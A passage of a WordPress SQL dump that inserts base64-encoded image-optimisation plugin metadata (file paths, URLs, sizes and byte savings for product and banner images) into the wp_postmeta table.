luZ3MtZTE0NzI4NDQ1NzgzNDUtMTYweDY4LmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2NvbmZvcm1hbC1jb2F0aW5ncy1lMTQ3Mjg0NDU3ODM0NS0xNjB4NjguanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiI2OCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9jb25mb3JtYWwtY29hdGluZ3MtZTE0NzI4NDQ1NzgzNDUtMTYweDY4LmpwZyIsInJlZHVjdGlvbiI6NDU1LCJ0aW1lIjoxNDgzNTc0NDEzLCJpZCI6MTIzMn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2NvbmZvcm1hbC1jb2F0aW5ncy1lMTQ3Mjg0NDU3ODM0NS0xODB4NjguanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvY29uZm9ybWFsLWNvYXRpbmdzLWUxNDcyODQ0NTc4MzQ1LTE4MHg2OC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjY4IiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2NvbmZvcm1hbC1jb2F0aW5ncy1lMTQ3Mjg0NDU3ODM0NS0xODB4NjguanBnIiwicmVkdWN0aW9uIjo0NzAsInRpbWUiOjE0ODM1NzQ0MTYsImlkIjoxMjMyfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvY29uZm9ybWFsLWNvYXRpbmdzLWUxNDcyODQ0NTc4MzQ1LTI0N3g2OC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9jb25mb3JtYWwtY29hdGluZ3MtZTE0NzI4NDQ1NzgzNDUtMjQ3eDY4LmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiNjgiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvY29uZm9ybWFsLWNvYXRpbmdzLWUxNDcyODQ0NTc4MzQ1LTI0N3g2OC5qcGciLCJyZWR1Y3Rpb24iOjUyOSwidGltZSI6MTQ4MzU3NDQxOSwiaWQiOjEyMzJ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9jb25mb3JtYWwtY29hdGluZ3MtZTE0NzI4NDQ1NzgzNDUtMzAweDY4LmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2NvbmZvcm1hbC1jb2F0aW5ncy1lMTQ3Mjg0NDU3ODM0NS0zMDB4NjguanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiI2OCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9jb25mb3JtYWwtY29hdGluZ3MtZTE0NzI4NDQ1NzgzNDUtMzAweDY4LmpwZyIsInJlZHVjdGlvbiI6NTI5LCJ0aW1lIjoxNDgzNTc0NDIzLCJpZCI6MTIzMn0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2NvbmZvcm1hbC1jb2F0aW5ncy1lMTQ3Mjg0NDU3ODM0NS00MDB4NjguanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvY29uZm9ybWFsLWNvYXRpbmdzLWUxNDcyODQ0NTc4MzQ1LTQwMHg2OC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjY4IiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2NvbmZvcm1hbC1jb2F0aW5ncy1lMTQ3Mjg0NDU3ODM0NS00MDB4NjguanBnIiwicmVkdWN0aW9uIjo1NDQsInRpbWUiOjE0ODM1NzQ0MjYsImlkIjoxMjMyfV0='); 
INSERT INTO `wp_postmeta` VALUES (29684, 1229, 'wpfc_optimisation_reduction', '1354817'); 
INSERT INTO `wp_postmeta` VALUES (29685, 1229, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSEVMT1hZLWZsZXhpYmlsaXplcnMuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IRUxPWFktZmxleGliaWxpemVycy5qcGciLCJ3aWR0aCI6MzUxNCwiaGVpZ2h0IjoyMTQ0LCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvSEVMT1hZLWZsZXhpYmlsaXplcnMuanBnIiwicmVkdWN0aW9uIjoxMzU0Njg3LCJ0aW1lIjoxNDgzNTc0NDM3LCJpZCI6IjEyMjkifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hFTE9YWS1mbGV4aWJpbGl6ZXJzLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSEVMT1hZLWZsZXhpYmlsaXplcnMtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9IRUxPWFktZmxleGliaWxpemVycy0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NDQzOSwiaWQiOjEyMjl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSEVMT1hZLWZsZXhpYmlsaXplcnMtODAweDQ4OC5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjQ4OCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IRUxPWFktZmxleGliaWxpemVycy04MDB4NDg4LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0hFTE9YWS1mbGV4aWJpbGl6ZXJzLTgwMHg0ODguanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc0NDQyLCJpZCI6MTIyOX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IRUxPWFktZmxleGliaWxpemVycy03Njh4NDY5LmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NDY5LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hFTE9YWS1mbGV4aWJpbGl6ZXJzLTc2OHg0NjkuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvSEVMT1hZLWZsZXhpYmlsaXplcnMtNzY4eDQ2OS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzQ0NDUsImlkIjoxMjI5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hFTE9YWS1mbGV4aWJpbGl6ZXJzLTE2MDB4OTc2LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjk3NiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IRUxPWFktZmxleGliaWxpemVycy0xNjAweDk3Ni5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9IRUxPWFktZmxleGliaWxpemVycy0xNjAweDk3Ni5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzQ0NDksImlkIjoxMjI5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hFTE9YWS1mbGV4aWJpbGl6ZXJzLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSEVMT1hZLWZsZXhpYmlsaXplcnMtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9IRUxPWFktZmxleGliaWxpemVycy0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NDQ1MiwiaWQiOjEyMjl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSEVMT1hZLWZsZXhpYmlsaXplcnMtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IRUxPWFktZmxleGliaWxpemVycy0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0hFTE9YWS1mbGV4aWJpbGl6ZXJzLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc0NDU0LCJpZCI6MTIyOX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IRUxPWFktZmxleGliaWxpemVycy0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hFTE9YWS1mbGV4aWJpbGl6ZXJzLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvSEVMT1hZLWZsZXhpYmlsaXplcnMtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzQ0NTYsImlkIjoxMjI5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hFTE9YWS1mbGV4aWJpbGl6ZXJzLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSEVMT1hZLWZsZXhpYmlsaXplcnMtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9IRUxPWFktZmxleGliaWxpemVycy01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NDQ1OSwiaWQiOjEyMjl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IRUxPWFktZmxleGliaWxpemVycy0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hFTE9YWS1mbGV4aWJpbGl6ZXJzLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvSEVMT1hZLWZsZXhpYmlsaXplcnMtMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjExNywidGltZSI6MTQ4MzU3NDQ2MiwiaWQiOjEyMjl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IRUxPWFktZmxleGliaWxpemVycy0xNjB4MTYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hFTE9YWS1mbGV4aWJpbGl6ZXJzLTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvSEVMT1hZLWZsZXhpYmlsaXplcnMtMTYweDE2MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzQ0NjQsImlkIjoxMjI5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSEVMT1hZLWZsZXhpYmlsaXplcnMtMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IRUxPWFktZmxleGliaWxpemVycy0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0hFTE9YWS1mbGV4aWJpbGl6ZXJzLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc0NDY2LCJpZCI6MTIyOX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hFTE9YWS1mbGV4aWJpbGl6ZXJzLTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSEVMT1hZLWZsZXhpYmlsaXplcnMtMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9IRUxPWFktZmxleGliaWxpemVycy0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NDQ2OSwiaWQiOjEyMjl9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IRUxPWFktZmxleGliaWxpemVycy0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0hFTE9YWS1mbGV4aWJpbGl6ZXJzLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvSEVMT1hZLWZsZXhpYmlsaXplcnMtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzQ0NzEsImlkIjoxMjI5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvSEVMT1hZLWZsZXhpYmlsaXplcnMtNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9IRUxPWFktZmxleGliaWxpemVycy00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0hFTE9YWS1mbGV4aWJpbGl6ZXJzLTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc0NDc0LCJpZCI6MTIyOX1d'); 
INSERT INTO `wp_postmeta` VALUES (29686, 1223, 'wpfc_optimisation_reduction', '1268'); 
INSERT INTO `wp_postmeta` VALUES (29687, 1223, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbWlsbGVyLXN0ZXBoZW5zb24tYmFubmVyLTEtZTE0NzI4NDM0MDU0ODguanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9taWxsZXItc3RlcGhlbnNvbi1iYW5uZXItMS1lMTQ3Mjg0MzQwNTQ4OC5qcGciLCJ3aWR0aCI6OTQ1LCJoZWlnaHQiOjY4LCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbWlsbGVyLXN0ZXBoZW5zb24tYmFubmVyLTEtZTE0NzI4NDM0MDU0ODguanBnIiwicmVkdWN0aW9uIjo4NjIsInRpbWUiOjE0ODM1NzQ0ODEsImlkIjoiMTIyMyJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbWlsbGVyLXN0ZXBoZW5zb24tYmFubmVyLTEtZTE0NzI4NDM0MDU0ODgtMzQweDY4LmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6NjgsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbWlsbGVyLXN0ZXBoZW5zb24tYmFubmVyLTEtZTE0NzI4NDM0MDU0ODgtMzQweDY4LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21pbGxlci1zdGVwaGVuc29uLWJhbm5lci0xLWUxNDcyODQzNDA1NDg4LTM0MHg2OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzQ0ODMsImlkIjoxMjIzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21pbGxlci1zdGVwaGVuc29uLWJhbm5lci0xLWUxNDcyODQzNDA1NDg4LTgwMHg1OC5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjU4LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21pbGxlci1zdGVwaGVuc29uLWJhbm5lci0xLWUxNDcyODQzNDA1NDg4LTgwMHg1OC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9taWxsZXItc3RlcGhlbnNvbi1iYW5uZXItMS1lMTQ3Mjg0MzQwNTQ4OC04MDB4NTguanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc0NDg1LCJpZCI6MTIyM30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9taWxsZXItc3RlcGhlbnNvbi1iYW5uZXItMS1lMTQ3Mjg0MzQwNTQ4OC03Njh4NTUuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1NSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9taWxsZXItc3RlcGhlbnNvbi1iYW5uZXItMS1lMTQ3Mjg0MzQwNTQ4OC03Njh4NTUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbWlsbGVyLXN0ZXBoZW5zb24tYmFubmVyLTEtZTE0NzI4NDM0MDU0ODgtNzY4eDU1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NDQ4NywiaWQiOjEyMjN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbWlsbGVyLXN0ZXBoZW5zb24tYmFubmVyLTEtZTE0NzI4NDM0MDU0ODgtMjUweDY4LmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6NjgsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbWlsbGVyLXN0ZXBoZW5zb24tYmFubmVyLTEtZTE0NzI4NDM0MDU0ODgtMjUweDY4LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21pbGxlci1zdGVwaGVuc29uLWJhbm5lci0xLWUxNDcyODQzNDA1NDg4LTI1MHg2OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzQ0ODksImlkIjoxMjIzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21pbGxlci1zdGVwaGVuc29uLWJhbm5lci0xLWUxNDcyODQzNDA1NDg4LTIwMHg2